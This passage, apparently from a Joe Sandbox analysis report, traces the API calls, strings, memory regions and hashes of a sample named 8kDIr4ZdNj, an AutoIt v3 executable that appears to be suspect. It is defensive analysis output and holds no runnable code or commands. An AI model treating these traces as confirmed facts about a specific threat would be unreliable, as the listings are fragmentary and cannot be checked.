                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008A0F20
                                                                        • Sleep.KERNEL32(0000000A,00955310,0095546C), ref: 008D4E83
                                                                        • TranslateMessage.USER32(?), ref: 008D5C60
                                                                        • DispatchMessageW.USER32(?), ref: 008D5C6E
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008D5C82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                        • API String ID: 4212290369-3242690629
                                                                        • Opcode ID: 1349bcfc64d645e50d4867a7b5eb4bf2d9e3f1210c8ad0fe33bb23414e29eda0
                                                                        • Instruction ID: cc25c0e1da62b752b2b08bd25fead477c373fd89d5b74029d966044cd6b4a204
                                                                        • Opcode Fuzzy Hash: 1349bcfc64d645e50d4867a7b5eb4bf2d9e3f1210c8ad0fe33bb23414e29eda0
                                                                        • Instruction Fuzzy Hash: E1B2AC70608745DFEB24DF28C894BAAB7E1FF85314F144A1EE49AD72A1DB70E844DB42

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 008F8F5F: __time64.LIBCMT ref: 008F8F69
                                                                          • Part of subcall function 00894EE5: _fseek.LIBCMT ref: 00894EFD
                                                                        • __wsplitpath.LIBCMT ref: 008F9234
                                                                          • Part of subcall function 008B40FB: __wsplitpath_helper.LIBCMT ref: 008B413B
                                                                        • _wcscpy.LIBCMT ref: 008F9247
                                                                        • _wcscat.LIBCMT ref: 008F925A
                                                                        • __wsplitpath.LIBCMT ref: 008F927F
                                                                        • _wcscat.LIBCMT ref: 008F9295
                                                                        • _wcscat.LIBCMT ref: 008F92A8
                                                                          • Part of subcall function 008F8FA5: _memmove.LIBCMT ref: 008F8FDE
                                                                          • Part of subcall function 008F8FA5: _memmove.LIBCMT ref: 008F8FED
                                                                        • _wcscmp.LIBCMT ref: 008F91EF
                                                                          • Part of subcall function 008F9734: _wcscmp.LIBCMT ref: 008F9824
                                                                          • Part of subcall function 008F9734: _wcscmp.LIBCMT ref: 008F9837
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008F9452
                                                                        • _wcsncpy.LIBCMT ref: 008F94C5
                                                                        • DeleteFileW.KERNEL32(?), ref: 008F94FB
                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008F9511
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F9522
                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F9534
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                        • String ID:
                                                                        • API String ID: 1500180987-0
                                                                        • Opcode ID: 1962a319d8b9fb3c34622de6cafebab39ed9f983b38824d92ca0ff6b6af07c8e
                                                                        • Instruction ID: f27631dcbfc9bbf9a8f4239e88d90f03418145f77e92b1e694d8ff37fdc2804a
                                                                        • Opcode Fuzzy Hash: 1962a319d8b9fb3c34622de6cafebab39ed9f983b38824d92ca0ff6b6af07c8e
                                                                        • Instruction Fuzzy Hash: FEC11CB1D0021DAADF21DFA9CC85EEEB7B9FF55310F0040AAF609E6251DB309A458F65

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00893074
                                                                        • RegisterClassExW.USER32(00000030), ref: 0089309E
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008930AF
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 008930CC
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008930DC
                                                                        • LoadIconW.USER32(000000A9), ref: 008930F2
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00893101
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: 939f771428c3fc120b43cddc367382c3cc1e00c5c823c097a9b0103828e2d4bf
                                                                        • Instruction ID: c5d222e18c0b433b5d9852e35a266559fa397de28f05df1c7d7f8d355521d407
                                                                        • Opcode Fuzzy Hash: 939f771428c3fc120b43cddc367382c3cc1e00c5c823c097a9b0103828e2d4bf
                                                                        • Instruction Fuzzy Hash: 3E3147B1965309AFDB00CFA4E895AC9BBF0FF08311F10812AF690A62A1D3B50585DF91

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00893074
• RegisterClassExW.USER32(00000030), ref: 0089309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008930AF
• InitCommonControlsEx.COMCTL32(?), ref: 008930CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008930DC
• LoadIconW.USER32(000000A9), ref: 008930F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00893101
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: b7c352476fbd815a96d97bc0bcd3a8811b791e8b8dc0b5dd102a05b1977408d0
• Instruction ID: dff9fdc5ea8860fc9e64c3e6c3cd03dde67c64a139ddf3f07b6acea5a01f7fe7
• Opcode Fuzzy Hash: b7c352476fbd815a96d97bc0bcd3a8811b791e8b8dc0b5dd102a05b1977408d0
• Instruction Fuzzy Hash: 6F21E5B1A2930CAFDB00DFA5E858BDDBBF4FB08701F00812AF610A62A1D7B14544EF91

Control-flow Graph

APIs
  • Part of subcall function 00894706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,0089715A,?,?,?,?,0089108C,?), ref: 00894724
  • Part of subcall function 008B050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00897165,?,?,?,?,0089108C,?), ref: 008B052D
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,0089108C,?), ref: 008971A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,0089108C,?), ref: 008CE8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,0089108C,?), ref: 008CE909
• RegCloseKey.ADVAPI32(?,?,?,?,?,0089108C,?), ref: 008CE947
• _wcscat.LIBCMT ref: 008CE9A0
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 3c9d472d1bb3b72ada62d18e2ce5c20d3d47b3e44ca3fdaf0d56803ea51d2a99
• Instruction ID: 55e714d9505d43c130edaefdee36b3497374347c3920c0bdc4343f871bf287c0
• Opcode Fuzzy Hash: 3c9d472d1bb3b72ada62d18e2ce5c20d3d47b3e44ca3fdaf0d56803ea51d2a99
• Instruction Fuzzy Hash: CB718E715283059EC710EF2AE8419ABBBF8FF95310F84452EF495C72A1EB70D948DB52

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00893A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00893A5F
• LoadIconW.USER32(00000063), ref: 00893A76
• LoadIconW.USER32(000000A4), ref: 00893A88
• LoadIconW.USER32(000000A2), ref: 00893A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00893AC0
• RegisterClassExW.USER32(?), ref: 00893B16
  • Part of subcall function 00893041: GetSysColorBrush.USER32(0000000F), ref: 00893074
  • Part of subcall function 00893041: RegisterClassExW.USER32(00000030), ref: 0089309E
  • Part of subcall function 00893041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008930AF
  • Part of subcall function 00893041: InitCommonControlsEx.COMCTL32(?), ref: 008930CC
  • Part of subcall function 00893041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008930DC
  • Part of subcall function 00893041: LoadIconW.USER32(000000A9), ref: 008930F2
  • Part of subcall function 00893041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00893101
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: f3b003059f0196dec74a2cfa6e97e19656f59560bae99f393034610aeb03c20c
• Instruction ID: 65cf3e664630248443b7bc602fb99699f81f2fd6b2c3d661d623da57e27132df
• Opcode Fuzzy Hash: f3b003059f0196dec74a2cfa6e97e19656f59560bae99f393034610aeb03c20c
• Instruction Fuzzy Hash: CA213E70E28708AFDF11DFA5EC19B9D7BB0FB08712F014119E514A62A2D3B55540EF84

Control-flow Graph (legend: Executed / Not Executed; rendered graph node and edge data not reproduced)

APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 008936D2
• KillTimer.USER32(?,00000001), ref: 008936FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0089371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0089372A
• CreatePopupMenu.USER32 ref: 0089373E
• PostQuitMessage.USER32(00000000), ref: 0089374D
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 364ea3b8deca1f265f8beba1a27dcfee7a83952b07c0b5a429d8c1934da9b36e
• Instruction ID: f71983b0aa1ed992f848837106f218f49002682f08259ec768a9306072eba51a
• Opcode Fuzzy Hash: 364ea3b8deca1f265f8beba1a27dcfee7a83952b07c0b5a429d8c1934da9b36e
• Instruction Fuzzy Hash: C241F8B2318B0DBBDF21BFA8DC19B7936A4F711301F180139F602D62A2D7719945B766

Control-flow Graph (legend: Executed / Not Executed; rendered graph node and edge data not reproduced)

APIs
• __wcsnicmp.LIBCMT ref: 008C07F0
• __wcsnicmp.LIBCMT ref: 008C080F
  • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: __wcsnicmp$__getptd_noexit
• String ID: P-}$UNICODE$UTF-16LE$UTF-8$ccs
• API String ID: 78897640-3509635038
• Opcode ID: 9b24bdd779b2a85b267ee1b779fc438c8a5f8adc0e73e1cd5b8d8d2682435141
• Instruction ID: e07cfb474f8d7f8dd0ef2a5afb69b78046e45553b343545b7d740e40a3642bc2
• Opcode Fuzzy Hash: 9b24bdd779b2a85b267ee1b779fc438c8a5f8adc0e73e1cd5b8d8d2682435141
• Instruction Fuzzy Hash: 445159B1D04305D9EB384EA49C05F752674FB207C8F28813EEC4AE66C1E6B6DE90AE41

Control-flow Graph (legend: Executed / Not Executed; rendered graph node and edge data not reproduced)

APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014FF36D
Memory Dump Source
• Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction ID: 49d92ca1739000d36c1a794a43810f2bff482cc614a3e78f551fb81a940e01bb
• Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction Fuzzy Hash: BB51E776A50208FBEB20DFA4CC49FDE7778AF48701F108559F74AEA280DA7496458B64

Control-flow Graph (legend: Executed / Not Executed; rendered graph node and edge data not reproduced)

APIs
• ___createFile.LIBCMT ref: 008C80DC
  • Part of subcall function 008C7CFD: ___crtIsPackagedApp.LIBCMT ref: 008C7D03
  • Part of subcall function 008C7CFD: GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 008C7D16
  • Part of subcall function 008C7CFD: GetProcAddress.KERNEL32(00000000), ref: 008C7D1D
• GetLastError.KERNEL32 ref: 008C8105
• __dosmaperr.LIBCMT ref: 008C810C
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 008C811F
• GetLastError.KERNEL32 ref: 008C8142
• __dosmaperr.LIBCMT ref: 008C814B
• CloseHandle.KERNEL32(?), ref: 008C8154
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: ErrorFileHandleLast__dosmaperr$AddressCloseModulePackagedProcType___create___crt
• String ID:
• API String ID: 569456945-0
• Opcode ID: 1723897dfb46476a87085c98d2521bbcba1e8dc88e161d90011965be17fda887
• Instruction ID: 907658bf117a35a47e5940f63c5eebfea28c7a46c40353514fc6bf75602b1094
• Opcode Fuzzy Hash: 1723897dfb46476a87085c98d2521bbcba1e8dc88e161d90011965be17fda887
• Instruction Fuzzy Hash: E111CD71A24609DBDB199F78DC19EAE7B74FB01364F18822CF821D72A1CB32C901EB00

Control-flow Graph (legend: Executed / Not Executed; rendered graph node and edge data not reproduced)

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00893A03
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00893A24
• ShowWindow.USER32(00000000), ref: 00893A38
• ShowWindow.USER32(00000000), ref: 00893A41
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 92812567c589608601c3c50385afb1df3b4df1ed9455daa1fc37c2a9fe58f99e
• Instruction ID: 319c6c150b894f21243b45c40d11d71fe4e38016a8aa92783a0d47116903ae7b
• Opcode Fuzzy Hash: 92812567c589608601c3c50385afb1df3b4df1ed9455daa1fc37c2a9fe58f99e
• Instruction Fuzzy Hash: 7DF054706657947EEA316713AC2CE773E7DD7C6F51F01402DB914A21B1C1B11840EB70

                                                                        Control-flow Graph
                                                                        • Basic blocks 89407c-89417d and 8cd3c8-8cd41e: LoadStringW, Shell_NotifyIconW; subcalls to 897a16, 897bcc, 897b2e, 896fe3, 897cab, 898047, 8b2de0, 89454e, 8b2dbc, 895904 (rendered graph not reproduced in text)
                                                                        APIs
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008CD3D7
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • _memset.LIBCMT ref: 008940FC
                                                                        • _wcscpy.LIBCMT ref: 00894150
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00894160
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                        • String ID: Line:
                                                                        • API String ID: 3942752672-1585850449
                                                                        • Opcode ID: 383fc243f269e3afdf7889a7b2cd3c5e24a4bff4cfdcf2eb45cf030bcbcde068
                                                                        • Instruction ID: 5b7fdbd55fe0b33073514abe62c77703a4c699e65135d3c03410ac96a8a98bf5
                                                                        • Opcode Fuzzy Hash: 383fc243f269e3afdf7889a7b2cd3c5e24a4bff4cfdcf2eb45cf030bcbcde068
                                                                        • Instruction Fuzzy Hash: 9931CD31018704AADB21FB64DC46FDB77E8FB40314F18491AF595D20A2EB70A649CB83

                                                                        Control-flow Graph
                                                                        • Basic blocks 8b541d-8b55e0: no direct API calls; subcalls to 8b8b28, 8b8db6, 8b2de0, 8c0ba7, 8c0cc8, 8b46e6, 8c0e5b (rendered graph not reproduced in text)
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1559183368-0
                                                                        • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                        • Instruction ID: e50612f99ea414bf4303ad1dbd5fcbc877ff6abe4493e1479e09c21896cf62f6
                                                                        • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                        • Instruction Fuzzy Hash: F1518070A00B09DBDB349EA9D8807EE77A6FF40326F248729F825D63D1D7719E908B45
                                                                        APIs
                                                                        • _free.LIBCMT ref: 008CE263
                                                                        • _free.LIBCMT ref: 008CE2AA
                                                                          • Part of subcall function 00896A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00896BAD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _free$CurrentDirectory
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                        • API String ID: 3924578-1757145024
                                                                        • Opcode ID: 21a2349f180949d5276d17884824fff5f893546ccfb6d627fed2345dd280e38d
                                                                        • Instruction ID: d0e542ab6dc756bb5a4b98be5ac998fc1fce1c14a3c8c533f03c4e8bdb2e4340
                                                                        • Opcode Fuzzy Hash: 21a2349f180949d5276d17884824fff5f893546ccfb6d627fed2345dd280e38d
                                                                        • Instruction Fuzzy Hash: 24915B7191421DAFCF04EFA8C891AEEB7B8FF05314B14442AF816EB2A1DB70A955CB51
                                                                        APIs
                                                                          • Part of subcall function 01500CB8: Sleep.KERNELBASE(000001F4), ref: 01500CC9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01500ED4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: H2U1C2JM9WM3N
                                                                        • API String ID: 2694422964-182228512
                                                                        • Opcode ID: 8709715334f97fda753b48465264202b7bc7c40cc922e505c9736c5c0a0d5ea9
                                                                        • Instruction ID: 8607dd95e95cc11f8fad1343c942c1cfe92ffbf02d29d0cbb138e86d3ea2bc30
                                                                        • Opcode Fuzzy Hash: 8709715334f97fda753b48465264202b7bc7c40cc922e505c9736c5c0a0d5ea9
                                                                        • Instruction Fuzzy Hash: A1519031D04259DBEF11DBE4C814BEEBB79BF54300F004599E618BB2C0DAB91B49CBA5
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008935A1,SwapMouseButtons,00000004,?), ref: 008935D4
                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008935A1,SwapMouseButtons,00000004,?,?,?,?,00892754), ref: 008935F5
                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,008935A1,SwapMouseButtons,00000004,?,?,?,?,00892754), ref: 00893617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
